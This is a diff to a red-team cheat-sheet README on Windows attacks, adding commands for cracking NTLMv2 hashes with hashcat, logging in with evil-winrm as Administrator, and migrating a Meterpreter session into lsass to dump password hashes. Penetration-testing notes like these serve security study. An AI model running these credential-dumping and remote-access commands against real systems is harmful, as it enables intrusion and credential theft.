lw8192/Red-Team-Rising/Windows/Readme.md

     hashcat -m 5600   #NTLMv2 (hashes captured from using a tool like Responder)

 ### Evil-WinRM
 Access port 5985.
-Use with a username / password or username / hash. $ evil-winrm -u Administrator -p password -i 10.10.10.10
+Use with a username / password or username / hash.

+    $ evil-winrm -u Administrator -p password -i 10.10.10.10

+### Metasploit and Meterpreter
+Meterpreter shell: need to migrate to lsass process to dump hashes, due to process permissions on Windows.

+    meter > migrate -N lsasse.exe
+    meter > hashdump